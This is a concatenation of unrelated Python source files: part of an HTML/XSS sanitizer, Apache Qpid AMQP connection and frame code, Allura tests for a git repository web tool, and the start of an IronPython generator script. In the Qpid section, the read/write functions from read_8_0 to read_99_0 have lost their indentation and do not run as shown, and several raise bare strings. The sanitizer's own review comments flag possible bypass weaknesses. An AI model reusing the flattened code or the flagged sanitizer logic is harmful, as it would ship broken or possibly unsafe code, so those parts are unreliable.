                                                attrs[attribute])
                    else:
                        bt += ' %s=%s' % (xssescape(attribute),
                                          quoteattr(attrs[attribute]))
                # Drop <a>/<img> that retained no attributes at all: a bare
                # anchor/image is useless and its close tag is suppressed
                # by the open_tags bookkeeping below.
                if bt == '<a' or bt == '<img':
                    return
            if tag in self.requires_no_close:
                bt += ' /'
            bt += '>'
            self.result += bt
            self.open_tags.insert(0, tag)

    def handle_endtag(self, tag, attrs):
        """Close permitted open tags; escape or strip disallowed ones."""
        bracketed = '</%s>' % tag
        if tag not in self.permitted_tags:
            if self.strip_disallowed:
                # NOTE(review): any disallowed end tag clears the flag, so
                # nested disallowed elements end strip mode early — confirm.
                self.in_disallowed = False
            else:
                self.result += xssescape(bracketed)
        elif tag in self.open_tags:
            self.result += bracketed
            self.open_tags.remove(tag)

    def unknown_starttag(self, tag, attributes):
        """sgmllib hook: route every start tag through handle_starttag."""
        self.handle_starttag(tag, None, attributes)

    def unknown_endtag(self, tag):
        """sgmllib hook: route every end tag through handle_endtag."""
        self.handle_endtag(tag, None)

    def url_is_acceptable(self, url):
        """
        Accepts relative and absolute urls

        Absolute URLs must use an allowed scheme and have a dotted host;
        relative URLs must be server-absolute (path starts with '/').
        """
        parsed = urlparse(url)
        return (parsed[0] in self.allowed_schemes and '.' in parsed[1]) \
            or (parsed[0] == '' and parsed[2].startswith('/'))

    def strip(self, rawstring, escape=True):
        """
        Returns the argument stripped of potentially harmful
        HTML or Javascript code

        @type escape: boolean
        @param escape: If True (default) it escapes the potentially harmful
          content, otherwise remove it

        NOTE(review): escape=False flips self.strip_disallowed on and it is
        never reset, so later calls on this instance always strip — confirm.
        """
        if not isinstance(rawstring, str): return str(rawstring)
        # Normalise self-closing forms so the parser sees '<br />' not '<br/>'.
        for tag in self.requires_no_close:
            rawstring = rawstring.replace("<%s/>" % tag, "<%s />" % tag)
        if not escape:
            self.strip_disallowed = True
        self.result = ''
        self.feed(rawstring)
        # Auto-close anything the input left dangling.
        for endtag in self.open_tags:
            if endtag not in self.requires_no_close:
                self.result += '</%s>' % endtag
        return self.result

    def xtags(self):
        """
        Returns a printable string informing the user which tags are allowed
        """
        tg = ''
        for x in sorted(self.permitted_tags):
            tg += '<' + x
            if x in self.allowed_attributes:
                for y in self.allowed_attributes[x]:
                    tg += ' %s=""' % y
            tg += '> '
        return xssescape(tg.strip())
def sanitize(text, permitted_tags=None, allowed_attributes=None, escape=True):
    """
    Return *text* stripped of potentially harmful HTML or Javascript.

    @param text: the (X)HTML fragment to clean; non-str input is coerced
        with str() and returned without parsing.
    @param permitted_tags: list of tag names to keep; a trailing '/' marks
        a tag that needs no closing tag (e.g. 'br/'). Defaults to a safe
        whitelist.
    @param allowed_attributes: dict mapping tag name to the attribute names
        kept on that tag. Defaults match the whitelist below.
    @type escape: boolean
    @param escape: If True (default) escape the potentially harmful
        content, otherwise remove it.
    """
    # Build fresh default whitelists per call: the previous list/dict
    # literal defaults were shared between calls (classic mutable-default
    # pitfall) and a caller could mutate the global whitelist in place.
    if permitted_tags is None:
        permitted_tags = [
            'a',
            'b',
            'blockquote',
            'br/',
            'i',
            'li',
            'ol',
            'ul',
            'p',
            'cite',
            'code',
            'pre',
            'img/',
            'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
            'table', 'tr', 'td', 'div',
        ]
    if allowed_attributes is None:
        allowed_attributes = {
            'a': ['href', 'title'],
            'img': ['src', 'alt'],
            'blockquote': ['type'],
            'td': ['colspan'],
        }
    if not isinstance(text, str):
        return str(text)
    return XssCleaner(permitted_tags=permitted_tags,
                      allowed_attributes=allowed_attributes).strip(text, escape)
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
A Connection class containing socket code that uses the spec metadata
to read and write Frame objects. This could be used by a client,
server, or even a proxy implementation.
"""
import socket, codec, logging, qpid
from cStringIO import StringIO
from codec import EOF
from compat import SHUT_RDWR
from exceptions import VersionError
from logging import getLogger, DEBUG
log = getLogger("qpid.connection08")
class SockIO:
  """File-like adapter over a TCP socket: write/read/flush/close with
  wire-level debug logging of the bytes moved."""

  def __init__(self, sock):
    self.sock = sock

  def write(self, buf):
    """Send all of buf, logging it first when debug logging is enabled."""
    # Guard the repr() cost behind the level check.
    if log.isEnabledFor(DEBUG):
      log.debug("OUT: %r", buf)
    self.sock.sendall(buf)

  def read(self, n):
    """Read up to n bytes; may return fewer on socket error or peer close."""
    chunks = []
    remaining = n
    while remaining > 0:
      try:
        chunk = self.sock.recv(remaining)
      except socket.error:
        break
      if not chunk:
        # Empty recv: the peer closed the connection.
        break
      chunks.append(chunk)
      remaining -= len(chunk)
    data = "".join(chunks)
    if log.isEnabledFor(DEBUG):
      log.debug("IN: %r", data)
    return data

  def flush(self):
    """No-op: writes go straight to the socket, nothing is buffered here."""
    pass

  def close(self):
    """Shut down both directions, then release the socket."""
    self.sock.shutdown(SHUT_RDWR)
    self.sock.close()
def connect(host, port):
  """Open a blocking TCP connection to host:port, wrapped in a SockIO."""
  address = (host, port)
  sock = socket.socket()
  sock.connect(address)
  sock.setblocking(1)  # ensure blocking mode regardless of defaults
  return SockIO(sock)
def listen(host, port, predicate = lambda: True):
  """Accept TCP connections on host:port, yielding each as a SockIO.

  predicate() is consulted before every accept so the caller can stop the
  loop; SO_REUSEADDR lets the port be rebound promptly after restart.
  """
  server = socket.socket()
  server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  server.bind((host, port))
  server.listen(5)
  while predicate():
    conn, _addr = server.accept()
    yield SockIO(conn)
class FramingError(Exception):
  """Raised when a malformed or unrecognized frame is read off the wire."""
  pass
class Connection:
  def __init__(self, io, spec):
    """Bind a codec over *io* and select the frame read/write methods
    matching the spec's AMQP major.minor version."""
    self.codec = codec.Codec(io, spec)
    self.spec = spec
    # Sentinel octet that terminates every frame on the wire.
    self.FRAME_END = self.spec.constants.byname["frame_end"].id
    # Version dispatch: resolves to write_<major>_<minor>/read_<major>_<minor>.
    self.write = getattr(self, "write_%s_%s" % (self.spec.major, self.spec.minor))
    self.read = getattr(self, "read_%s_%s" % (self.spec.major, self.spec.minor))
  def flush(self):
    """Flush buffered output through the codec to the underlying io."""
    self.codec.flush()
  # Protocol header layout: the 4-byte literal "AMQP" followed by four
  # octets (network byte order struct format).
  INIT="!4s4B"

  def init(self):
    """Send the AMQP protocol header advertising this spec's version."""
    self.codec.pack(Connection.INIT, "AMQP", 1, 1, self.spec.major,
                    self.spec.minor)

  def tini(self):
    """Read (and discard) the peer's AMQP protocol header."""
    self.codec.unpack(Connection.INIT)
  def write_8_0(self, frame):
    """Encode *frame* using AMQP 0-8 framing: type octet, channel,
    length-prefixed payload, frame-end octet."""
    c = self.codec
    c.encode_octet(self.spec.constants.byname[frame.type].id)
    c.encode_short(frame.channel)
    # Encode the payload into a scratch buffer first so it can be emitted
    # as a single length-prefixed long string.
    body = StringIO()
    enc = codec.Codec(body, self.spec)
    frame.encode(enc)
    enc.flush()
    c.encode_longstr(body.getvalue())
    c.encode_octet(self.FRAME_END)
def read_8_0(self):
c = self.codec
tid = c.decode_octet()
try:
type = self.spec.constants.byid[tid].name
except KeyError:
if tid == ord('A') and c.unpack("!3s") == "MQP":
_, _, major, minor = c.unpack("4B")
raise VersionError("client: %s-%s, server: %s-%s" %
(self.spec.major, self.spec.minor, major, minor))
else:
raise FramingError("unknown frame type: %s" % tid)
try:
channel = c.decode_short()
body = c.decode_longstr()
dec = codec.Codec(StringIO(body), self.spec)
frame = Frame.DECODERS[type].decode(self.spec, dec, len(body))
frame.channel = channel
end = c.decode_octet()
if end != self.FRAME_END:
garbage = ""
while end != self.FRAME_END:
garbage += chr(end)
end = c.decode_octet()
raise "frame error: expected %r, got %r" % (self.FRAME_END, garbage)
return frame
except EOF:
# An EOF caught here can indicate an error decoding the frame,
# rather than that a disconnection occurred,so it's worth logging it.
log.exception("Error occurred when reading frame with tid %s" % tid)
raise
def write_0_9(self, frame):
self.write_8_0(frame)
def read_0_9(self):
return self.read_8_0()
def write_0_91(self, frame):
self.write_8_0(frame)
def read_0_91(self):
return self.read_8_0()
def write_0_10(self, frame):
c = self.codec
flags = 0
if frame.bof: flags |= 0x08
if frame.eof: flags |= 0x04
if frame.bos: flags |= 0x02
if frame.eos: flags |= 0x01
c.encode_octet(flags) # TODO: currently fixed at ver=0, B=E=b=e=1
c.encode_octet(self.spec.constants.byname[frame.type].id)
body = StringIO()
enc = codec.Codec(body, self.spec)
frame.encode(enc)
enc.flush()
frame_size = len(body.getvalue()) + 12 # TODO: Magic number (frame header size)
c.encode_short(frame_size)
c.encode_octet(0) # Reserved
c.encode_octet(frame.subchannel & 0x0f)
c.encode_short(frame.channel)
c.encode_long(0) # Reserved
c.write(body.getvalue())
c.encode_octet(self.FRAME_END)
def read_0_10(self):
c = self.codec
flags = c.decode_octet() # TODO: currently ignoring flags
framing_version = (flags & 0xc0) >> 6
if framing_version != 0:
raise "frame error: unknown framing version"
type = self.spec.constants.byid[c.decode_octet()].name
frame_size = c.decode_short()
if frame_size < 12: # TODO: Magic number (frame header size)
raise "frame error: frame size too small"
reserved1 = c.decode_octet()
field = c.decode_octet()
subchannel = field & 0x0f
channel = c.decode_short()
reserved2 = c.decode_long() # TODO: reserved maybe need to ensure 0
if (flags & 0x30) != 0 or reserved1 != 0 or (field & 0xf0) != 0:
raise "frame error: reserved bits not all zero"
body_size = frame_size - 12 # TODO: Magic number (frame header size)
body = c.read(body_size)
dec = codec.Codec(StringIO(body), self.spec)
try:
frame = Frame.DECODERS[type].decode(self.spec, dec, len(body))
except EOF:
raise "truncated frame body: %r" % body
frame.channel = channel
frame.subchannel = subchannel
end = c.decode_octet()
if end != self.FRAME_END:
garbage = ""
while end != self.FRAME_END:
garbage += chr(end)
end = c.decode_octet()
raise "frame error: expected %r, got %r" % (self.FRAME_END, garbage)
return frame
def write_99_0(self, frame):
self.write_0_10(frame)
def read_99_0(self):
return self.read_0_10()
class Frame:
    """Base class for AMQP frames.

    The (Python 2) metaclass enforces that every subclass defines
    encode/decode/type, turns decode into a staticmethod, wraps __init__
    so common frame state is initialized first, and registers concrete
    frame types in Frame.DECODERS keyed by their wire type name.

    Idiom cleanups vs. the original: dict.has_key(k) -> k in dict, and
    `!= None` -> `is not None` (behavior-identical).
    """

    # Maps wire type name (e.g. "frame_method") -> Frame subclass.
    DECODERS = {}

    class __metaclass__(type):
        def __new__(cls, name, bases, dict):
            for attr in ("encode", "decode", "type"):
                if attr not in dict:
                    raise TypeError("%s must define %s" % (name, attr))
            dict["decode"] = staticmethod(dict["decode"])
            if "__init__" in dict:
                __init__ = dict["__init__"]
                def init(self, *args, **kwargs):
                    # Run common frame setup before the subclass __init__.
                    args = list(args)
                    self.init(args, kwargs)
                    __init__(self, *args, **kwargs)
                dict["__init__"] = init
            t = type.__new__(cls, name, bases, dict)
            # Only concrete frame types (type is not None) are registered.
            if t.type is not None:
                Frame.DECODERS[t.type] = t
            return t

    type = None

    def init(self, args, kwargs):
        """Pop common framing kwargs and set segment-boundary defaults."""
        self.channel = kwargs.pop("channel", 0)
        self.subchannel = kwargs.pop("subchannel", 0)
        self.bos = True
        self.eos = True
        self.bof = True
        self.eof = True

    def encode(self, enc): abstract

    def decode(spec, dec, size): abstract
class Method(Frame):
    """A method frame: a protocol method definition plus its argument values."""

    type = "frame_method"

    def __init__(self, method, args):
        if len(args) != len(method.fields):
            argspec = ["%s: %s" % (f.name, f.type)
                       for f in method.fields]
            raise TypeError("%s.%s expecting (%s), got %s" %
                            (method.klass.name, method.name, ", ".join(argspec),
                             args))
        self.method = method
        self.method_type = method
        self.args = args
        # A method with no content ends its frame segment here.
        self.eof = not method.content

    def encode(self, c):
        version = (c.spec.major, c.spec.minor)
        # 0-10 and 99-0 use octet class/method ids; older versions use shorts.
        if version == (0, 10) or version == (99, 0):
            c.encode_octet(self.method.klass.id)
            c.encode_octet(self.method.id)
        else:
            c.encode_short(self.method.klass.id)
            c.encode_short(self.method.id)
        for field, arg in zip(self.method.fields, self.args):
            c.encode(field.type, arg)

    def decode(spec, c, size):
        version = (c.spec.major, c.spec.minor)
        if version == (0, 10) or version == (99, 0):
            klass = spec.classes.byid[c.decode_octet()]
            meth = klass.methods.byid[c.decode_octet()]
        else:
            klass = spec.classes.byid[c.decode_short()]
            meth = klass.methods.byid[c.decode_short()]
        args = tuple([c.decode(f.type) for f in meth.fields])
        return Method(meth, args)

    def __str__(self):
        return "[%s] %s %s" % (self.channel, self.method,
                               ", ".join([str(a) for a in self.args]))
class Request(Frame):
    """A request frame: a method plus request-id / response-mark bookkeeping."""

    type = "frame_request"

    def __init__(self, id, response_mark, method):
        self.id = id
        self.response_mark = response_mark
        self.method = method
        self.method_type = method.method_type
        self.args = method.args

    def encode(self, enc):
        enc.encode_longlong(self.id)
        enc.encode_longlong(self.response_mark)
        # reserved
        enc.encode_long(0)
        self.method.encode(enc)

    def decode(spec, dec, size):
        id = dec.decode_longlong()
        mark = dec.decode_longlong()
        # reserved
        dec.decode_long()
        # 20 = two longlongs + one long consumed above.
        method = Method.decode(spec, dec, size - 20)
        return Request(id, mark, method)

    def __str__(self):
        return "[%s] Request(%s) %s" % (self.channel, self.id, self.method)
class Response(Frame):
    """A response frame: a method answering one or a batch of requests."""

    type = "frame_response"

    def __init__(self, id, request_id, batch_offset, method):
        self.id = id
        self.request_id = request_id
        self.batch_offset = batch_offset
        self.method = method
        self.method_type = method.method_type
        self.args = method.args

    def encode(self, enc):
        enc.encode_longlong(self.id)
        enc.encode_longlong(self.request_id)
        enc.encode_long(self.batch_offset)
        self.method.encode(enc)

    def decode(spec, dec, size):
        id = dec.decode_longlong()
        request_id = dec.decode_longlong()
        batch_offset = dec.decode_long()
        # 20 = two longlongs + one long consumed above.
        method = Method.decode(spec, dec, size - 20)
        return Response(id, request_id, batch_offset, method)

    def __str__(self):
        return "[%s] Response(%s,%s,%s) %s" % (self.channel, self.id, self.request_id, self.batch_offset, self.method)
def uses_struct_encoding(spec):
    """True for protocol versions (0-10 and 99-0) that encode headers as structs."""
    return (spec.major, spec.minor) in ((0, 10), (99, 0))
class Header(Frame):
    """A content header frame: class, weight, body size and properties.

    Encoding/decoding dispatches between the legacy 0-8 flag-word layout
    and the 0-10 struct layout depending on the spec version.
    """

    type = "frame_header"

    def __init__(self, klass, weight, size, properties):
        self.klass = klass
        self.weight = weight
        self.size = size
        self.properties = properties
        # A zero-size body means no body frames follow this header.
        self.eof = size == 0
        self.bof = False

    def __getitem__(self, name):
        return self.properties[name]

    def __setitem__(self, name, value):
        self.properties[name] = value

    def __delitem__(self, name):
        del self.properties[name]

    def encode(self, c):
        if uses_struct_encoding(c.spec):
            self.encode_structs(c)
        else:
            self.encode_legacy(c)

    def encode_structs(self, c):
        """0-10 layout: properties distributed into delivery/message structs."""
        # XXX
        structs = [qpid.Struct(c.spec.domains.byname["delivery_properties"].type),
                   qpid.Struct(c.spec.domains.byname["message_properties"].type)]
        # XXX
        props = self.properties.copy()
        for k in self.properties:
            for s in structs:
                if s.exists(k):
                    s.set(k, props.pop(k))
        if props:
            # Anything left over fits in neither struct.
            raise TypeError("no such property: %s" % (", ".join(props)))
        # message properties store the content-length now, and weight is
        # deprecated
        if self.size != None:
            structs[1].content_length = self.size
        for s in structs:
            c.encode_long_struct(s)

    def encode_legacy(self, c):
        """0-8 layout: class id, weight, size, then 15-bit flag words."""
        c.encode_short(self.klass.id)
        c.encode_short(self.weight)
        c.encode_longlong(self.size)
        # property flags
        nprops = len(self.klass.fields)
        flags = 0
        for i in range(nprops):
            f = self.klass.fields.items[i]
            flags <<= 1
            if self.properties.get(f.name) != None:
                flags |= 1
            # the last bit indicates more flags
            if i > 0 and (i % 15) == 0:
                flags <<= 1
                if nprops > (i + 1):
                    flags |= 1
                c.encode_short(flags)
                flags = 0
        # Left-justify the final (possibly partial) flag word.
        flags <<= ((16 - (nprops % 15)) % 16)
        c.encode_short(flags)
        # properties
        for f in self.klass.fields:
            v = self.properties.get(f.name)
            if v != None:
                c.encode(f.type, v)

    def decode(spec, c, size):
        if uses_struct_encoding(spec):
            return Header.decode_structs(spec, c, size)
        else:
            return Header.decode_legacy(spec, c, size)

    def decode_structs(spec, c, size):
        """Decode 0-10 style: consume long structs until `size` bytes read."""
        structs = []
        start = c.nread
        while c.nread - start < size:
            structs.append(c.decode_long_struct())
        # XXX
        props = {}
        length = None
        for s in structs:
            for f in s.type.fields:
                if s.has(f.name):
                    props[f.name] = s.get(f.name)
                    if f.name == "content_length":
                        length = s.get(f.name)
        return Header(None, 0, length, props)
    decode_structs = staticmethod(decode_structs)

    def decode_legacy(spec, c, size):
        """Decode 0-8 style: flag words select which properties follow."""
        klass = spec.classes.byid[c.decode_short()]
        weight = c.decode_short()
        size = c.decode_longlong()
        # property flags
        bits = []
        while True:
            flags = c.decode_short()
            for i in range(15, 0, -1):
                if flags >> i & 0x1 != 0:
                    bits.append(True)
                else:
                    bits.append(False)
            # Lowest bit set means another flag word follows.
            if flags & 0x1 == 0:
                break
        # properties
        properties = {}
        for b, f in zip(bits, klass.fields):
            if b:
                # Note: decode returns a unicode u'' string but only
                # plain '' strings can be used as keywords so we need to
                # stringify the names.
                properties[str(f.name)] = c.decode(f.type)
        return Header(klass, weight, size, properties)
    decode_legacy = staticmethod(decode_legacy)

    def __str__(self):
        return "%s %s %s %s" % (self.klass, self.weight, self.size,
                                self.properties)
class Body(Frame):
    """A content body frame carrying one opaque chunk of payload bytes."""

    type = "frame_body"

    def __init__(self, content):
        self.content = content
        self.eof = True
        self.bof = False

    def encode(self, enc):
        # The payload is written verbatim; framing is added by Connection.
        enc.write(self.content)

    def decode(_spec, stream, length):
        # Slurp exactly the declared payload length from the stream.
        return Body(stream.read(length))

    def __str__(self):
        return "Body({!r})".format(self.content)
# TODO:
# OOB_METHOD = "frame_oob_method"
# OOB_HEADER = "frame_oob_header"
# OOB_BODY = "frame_oob_body"
# TRACE = "frame_trace"
# HEARTBEAT = "frame_heartbeat"
|
|
import json
import re
import tg
import pkg_resources
import pylons
# Compatibility aliases: legacy code imports the c/g magic globals from pylons.
pylons.c = pylons.tmpl_context
pylons.g = pylons.app_globals
from pylons import c
from ming.orm import ThreadLocalORMSession
from datadiff.tools import assert_equal
from allura import model as M
from allura.lib import helpers as h
from allura.tests import decorators as td
from alluratest.controller import TestController
class _TestCase(TestController):
    """Shared fixture: points the 'test' project's src-git tool at the
    bundled testgit.git repository and refreshes it before each test."""

    def setUp(self):
        super(_TestCase, self).setUp()
        self.setup_with_tools()

    @td.with_git
    def setup_with_tools(self):
        h.set_context('test', 'src-git', neighborhood='Projects')
        repo_dir = pkg_resources.resource_filename(
            'forgegit', 'tests/data')
        c.app.repo.fs_path = repo_dir
        c.app.repo.status = 'ready'
        c.app.repo.name = 'testgit.git'
        ThreadLocalORMSession.flush_all()
        # ThreadLocalORMSession.close_all()
        h.set_context('test', 'src-git', neighborhood='Projects')
        c.app.repo.refresh()
        ThreadLocalORMSession.flush_all()
        # ThreadLocalORMSession.close_all()

    @td.with_tool('test', 'Git', 'testgit-index', 'Git', type='git')
    def setup_testgit_index_repo(self):
        # Secondary repo fixture used by tests that need index.* filenames.
        h.set_context('test', 'testgit-index', neighborhood='Projects')
        repo_dir = pkg_resources.resource_filename(
            'forgegit', 'tests/data')
        c.app.repo.fs_path = repo_dir
        c.app.repo.status = 'ready'
        c.app.repo.name = 'testgit_index.git'
        ThreadLocalORMSession.flush_all()
        h.set_context('test', 'testgit-index', neighborhood='Projects')
        c.app.repo.refresh()
        ThreadLocalORMSession.flush_all()
class TestRootController(_TestCase):
    """Functional tests for the git tool's web UI (status, browsing,
    diffs, feeds, subscriptions)."""

    def test_status(self):
        resp = self.app.get('/src-git/status')
        d = json.loads(resp.body)
        assert d == dict(status='ready')

    def test_status_html(self):
        resp = self.app.get('/src-git/').follow().follow()
        # repo status not displayed if 'ready'
        assert None == resp.html.find('div', dict(id='repo_status'))
        h.set_context('test', 'src-git', neighborhood='Projects')
        c.app.repo.status = 'analyzing'
        ThreadLocalORMSession.flush_all()
        ThreadLocalORMSession.close_all()
        # repo status displayed if not 'ready'
        resp = self.app.get('/src-git/').follow().follow()
        div = resp.html.find('div', dict(id='repo_status'))
        assert div.span.text == 'analyzing'

    def test_index(self):
        resp = self.app.get('/src-git/').follow().follow()
        assert 'git://' in resp

    def test_index_empty(self):
        self.app.get('/git/')

    def test_commit_browser(self):
        resp = self.app.get('/src-git/commit_browser')

    def test_commit_browser_data(self):
        resp = self.app.get('/src-git/commit_browser_data')
        data = json.loads(resp.body);
        assert data['max_row'] == 3
        assert data['next_column'] == 1
        assert_equal(data['built_tree']['df30427c488aeab84b2352bdf88a3b19223f9d7a'],
                     {u'url': u'/p/test/src-git/ci/df30427c488aeab84b2352bdf88a3b19223f9d7a/',
                      u'oid': u'df30427c488aeab84b2352bdf88a3b19223f9d7a',
                      u'column': 0,
                      u'parents': [u'6a45885ae7347f1cac5103b0050cc1be6a1496c8'],
                      u'message': u'Add README', u'row': 1})

    def test_log(self):
        resp = self.app.get('/src-git/ref/master~/log/')

    def test_tags(self):
        resp = self.app.get('/src-git/ref/master~/tags/')

    def _get_ci(self):
        # Resolve master to a commit URL by following the redirect and
        # scraping the first commit link off the page.
        r = self.app.get('/src-git/ref/master:/')
        resp = r.follow()
        for tag in resp.html.findAll('a'):
            if tag['href'].startswith('/p/test/src-git/ci/'):
                return tag['href']
        return None

    def test_commit(self):
        ci = self._get_ci()
        resp = self.app.get(ci)
        assert 'Rick' in resp, resp.showbrowser()

    def test_feed(self):
        assert 'Add README' in self.app.get('/feed')

    def test_tree(self):
        ci = self._get_ci()
        resp = self.app.get(ci + 'tree/')
        assert len(resp.html.findAll('tr')) == 2, resp.showbrowser()
        resp = self.app.get(ci + 'tree/')
        assert 'README' in resp, resp.showbrowser()
        links = [ a.get('href') for a in resp.html.findAll('a') ]
        assert 'README' in links, resp.showbrowser()
        assert 'README/' not in links, resp.showbrowser()

    def test_tree_extra_params(self):
        ci = self._get_ci()
        resp = self.app.get(ci + 'tree/?format=raw')
        assert 'README' in resp, resp.showbrowser()

    def test_file(self):
        ci = self._get_ci()
        resp = self.app.get(ci + 'tree/README')
        assert 'README' in resp.html.find('h2', {'class':'dark title'}).contents[2]
        content = str(resp.html.find('div', {'class':'clip grid-19'}))
        assert 'This is readme' in content, content
        assert '<span id="l1" class="code_block">' in resp
        assert 'var hash = window.location.hash.substring(1);' in resp

    def test_invalid_file(self):
        ci = self._get_ci()
        self.app.get(ci + 'tree/READMEz', status=404)

    def test_diff(self):
        ci = self._get_ci()
        resp = self.app.get(ci + 'tree/README?diff=df30427c488aeab84b2352bdf88a3b19223f9d7a')
        assert 'readme' in resp, resp.showbrowser()
        assert '+++' in resp, resp.showbrowser()

    def test_refresh(self):
        # The refresh in setup should have sent a commit notification whose
        # reply-to address embeds the reversed tool path plus mail domain.
        notification = M.Notification.query.find(
            dict(subject='[test:src-git] 4 new commits to test Git')).first()
        domain = '.'.join(reversed(c.app.url[1:-1].split('/'))).replace('_', '-')
        common_suffix = tg.config.get('forgemail.domain', '.sourceforge.net')
        email = 'noreply@%s%s' % (domain, common_suffix)
        assert email in notification['reply_to_address']

    def test_file_force_display(self):
        ci = self._get_ci()
        resp = self.app.get(ci + 'tree/README?force=True')
        content = str(resp.html.find('div', {'class':'clip grid-19'}))
        assert re.search(r'<pre>.*This is readme', content), content
        assert '</pre>' in content, content

    def test_index_files(self):
        """Test that `index.*` files are viewable in code browser"""
        self.setup_testgit_index_repo()
        ci = '/p/test/testgit-index/ci/eaec8e7fc91f18d6bf294379d16146ef9226a1ab/'
        # `index.html` in repo root
        r = self.app.get(ci + 'tree/index.html')
        header = r.html.find('h2', {'class': 'dark title'}).contents[2]
        assert 'index.html' in header, header
        content = str(r.html.find('div', {'class': 'clip grid-19'}))
        assert ('<span class="nt"><h1></span>'
                'index.html'
                '<span class="nt"></h1></span>') in content, content
        # `index` dir in repo root
        r = self.app.get(ci + 'tree/index/')
        assert 'inside_index_dir.txt' in r
        # `index.htm` in `index` dir
        r = self.app.get(ci + 'tree/index/index.htm')
        header = r.html.find('h2', {'class': 'dark title'})
        assert 'index' in header.contents[3], header.contents[3]
        assert 'index.htm' in header.contents[4], header.contents[4]
        content = str(r.html.find('div', {'class': 'clip grid-19'}))
        assert ('<span class="nt"><h1></span>'
                'index/index.htm'
                '<span class="nt"></h1></span>') in content, content

    def test_subscribe(self):
        user = M.User.query.get(username='test-user')
        ci = self._get_ci()
        # user is not subscribed
        assert not M.Mailbox.subscribed(user_id=user._id)
        r = self.app.get(ci + 'tree/',
                         extra_environ={'username': str(user.username)})
        header = r.html.find('h2', {'class': 'dark title'})
        link = header.find('a', {'class': 'artifact_subscribe'})
        assert link is not None, header
        # subscribe
        self.app.get(ci + 'tree/subscribe?subscribe=True',
                     extra_environ={'username': str(user.username)}).follow()
        # user is subscribed
        assert M.Mailbox.subscribed(user_id=user._id)
        r = self.app.get(ci + 'tree/',
                         extra_environ={'username': str(user.username)})
        header = r.html.find('h2', {'class': 'dark title'})
        link = header.find('a', {'class': 'artifact_unsubscribe active'})
        assert link is not None, header
        # unsubscribe
        self.app.get(ci + 'tree/subscribe?unsubscribe=True',
                     extra_environ={'username': str(user.username)}).follow()
        # user is not subscribed
        assert not M.Mailbox.subscribed(user_id=user._id)
        r = self.app.get(ci + 'tree/',
                         extra_environ={'username': str(user.username)})
        header = r.html.find('h2', {'class': 'dark title'})
        link = header.find('a', {'class': 'artifact_subscribe'})
        assert link is not None, header
class TestRestController(_TestCase):
    """Smoke tests for the repository REST API endpoints."""

    def test_index(self):
        self.app.get('/rest/p/test/src-git/', status=200)

    def test_commits(self):
        self.app.get('/rest/p/test/src-git/commits', status=200)
class TestFork(_TestCase):
    """Tests forking src-git into project test2 and the merge-request flow."""

    def setUp(self):
        super(TestFork, self).setUp()
        # Fork src-git into test2/code and clone the underlying repo.
        to_project = M.Project.query.get(
            shortname='test2', neighborhood_id=c.project.neighborhood_id)
        r = self.app.post('/src-git/fork', params=dict(
            project_id=str(to_project._id),
            mount_point='code',
            mount_label='Test forked repository'))
        assert "{status: 'error'}" not in str(r.follow())
        cloned_from = c.app.repo
        with h.push_context('test2', 'code', neighborhood='Projects'):
            c.app.repo.init_as_clone(
                cloned_from.full_fs_path,
                cloned_from.app.config.script_name(),
                cloned_from.full_fs_path)

    def _follow(self, r, **kw):
        # Follow redirect chains, printing each hop for debuggability.
        if r.status_int == 302:
            print r.request.url
        while r.status_int == 302:
            print ' ==> 302 ==> %s' % r.location
            r = r.follow(**kw)
        return r

    def _upstream_page(self, **kw):
        r = self.app.get('/src-git/', **kw)
        r = self._follow(r, **kw)
        return r

    def _fork_page(self, **kw):
        r = self.app.get('/p/test2/code/', **kw)
        r = self._follow(r, **kw)
        return r

    def _request_merge(self, **kw):
        # Submit the merge-request form; the resulting URL ends in the
        # merge request number.
        r = self.app.get('/p/test2/code/request_merge', **kw)
        r = self._follow(r, **kw)
        r = r.forms[0].submit()
        r = self._follow(r, **kw)
        mr_num = r.request.url.split('/')[-2]
        assert mr_num.isdigit(), mr_num
        return r, mr_num

    def test_fork_form(self):
        r = self.app.get('%sfork/' % c.app.repo.url())
        assert '<input type="text" name="mount_point" value="test"/>' in r
        assert '<input type="text" name="mount_label" value="test - Git"/>' in r

    def test_fork_listed_in_parent(self):
        assert 'Forks' in self._upstream_page()

    def test_fork_display(self):
        r = self._fork_page()
        assert 'Clone of' in r
        assert 'Test forked repository' in r

    def test_fork_links_go_to_fork(self):
        r = self._fork_page()
        hrefs = ( a.get('href') for a in r.html('a') )
        hrefs = ( href for href in hrefs if href and '/ci/' in href )
        for href in hrefs:
            assert href.startswith('/p/test2/code/'), href

    def test_merge_request_visible_to_admin(self):
        assert 'Request Merge' in self._fork_page()

    def test_merge_request_invisible_to_non_admin(self):
        assert 'Request Merge' not in self._fork_page(
            extra_environ=dict(username='test-user'))

    def test_merge_action_available_to_admin(self):
        self.app.get('/p/test2/code/request_merge')

    def test_merge_action_unavailable_to_non_admin(self):
        self.app.get(
            '/p/test2/code/request_merge',
            status=403, extra_environ=dict(username='test-user'))

    def test_merge_request_detail_view(self):
        r, mr_num = self._request_merge()
        assert 'would like you to merge' in r, r.showbrowser()

    def test_merge_request_list_view(self):
        r, mr_num = self._request_merge()
        r = self.app.get('/p/test/src-git/merge-requests/')
        assert 'href="%s/"' % mr_num in r, r

    def test_merge_request_update_status(self):
        r, mr_num = self._request_merge()
        r = self.app.post('/p/test/src-git/merge-requests/%s/save' % mr_num,
                          params=dict(status='rejected')).follow()
        assert 'Merge Request #%s: (rejected)' % mr_num in r, r
|
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
from generate import generate
def add_not_null(arg_t):
    """Prefix a C# parameter type with [NotNull] unless it is nullable."""
    if arg_t.endswith("?"):
        return arg_t
    return "[NotNull] " + arg_t
def get_type(mutable):
    """C# type name for the mutable or frozen set variant."""
    return 'SetCollection' if mutable else 'FrozenSetCollection'
def get_arg_ts(mutable):
    """Argument types an overload set accepts: own type, the other set
    variant, then any object."""
    own = get_type(mutable)
